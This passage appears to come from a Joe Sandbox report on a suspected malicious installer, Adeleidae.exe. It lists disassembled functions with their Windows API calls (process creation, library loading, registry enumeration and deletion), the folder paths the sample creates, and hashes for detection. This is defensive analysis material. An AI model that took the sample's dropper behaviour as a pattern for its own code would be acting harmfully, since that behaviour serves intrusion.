GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5E
nsa, xrefs: 00405C66

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNELBASE(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 202043c5454dda3a880ce226d345d46afecf88c14aec0c9bc18f41e47eb9550b
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: 202043c5454dda3a880ce226d345d46afecf88c14aec0c9bc18f41e47eb9550b
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AB4: CharNextW.USER32(?,?,C:\,0040A300,00405B28,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes
API String ID: 1892508949-2295479969
Opcode ID: 700f7c9df297e71183510105018fd9ed945753e44605edea45ba797e43a191dd
Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
Opcode Fuzzy Hash: 700f7c9df297e71183510105018fd9ed945753e44605edea45ba797e43a191dd
Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(00010476,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8468dde12270efaee3623ef0ee2643c620c6226164998a0f0f0bd77c720df999
Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
Opcode Fuzzy Hash: 8468dde12270efaee3623ef0ee2643c620c6226164998a0f0f0bd77c720df999
Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 52b1034902b6533bd2d6d50c47519d0e0d132e6ce1eb16c8f111a809d007a761
Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
Opcode Fuzzy Hash: 52b1034902b6533bd2d6d50c47519d0e0d132e6ce1eb16c8f111a809d007a761
Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: e8cdc2980028b670d4ddc5f3186f10a85cd29f3b4eedee526efe3e64a1379a7a
Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
Opcode Fuzzy Hash: e8cdc2980028b670d4ddc5f3186f10a85cd29f3b4eedee526efe3e64a1379a7a
Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C

Function 0040231F Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
RegCloseKey.ADVAPI32(00000000), ref: 00402347

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 45e7bfa75de394aabc60a00221bac3dee61c605efc9a99c65b382dbe1571e612
Instruction ID: c2222f3894d46b01c01a36c2377af854b7dcf2fa525412944523e76cc0079291
Opcode Fuzzy Hash: 45e7bfa75de394aabc60a00221bac3dee61c605efc9a99c65b382dbe1571e612
Instruction Fuzzy Hash: 2DF04F32A04110ABEB11BFB59B4EABE72699B80314F15803BF501B71D5D9FC99015629

Function 0040642B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
GetProcAddress.KERNEL32(00000000,?), ref: 00406458

Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
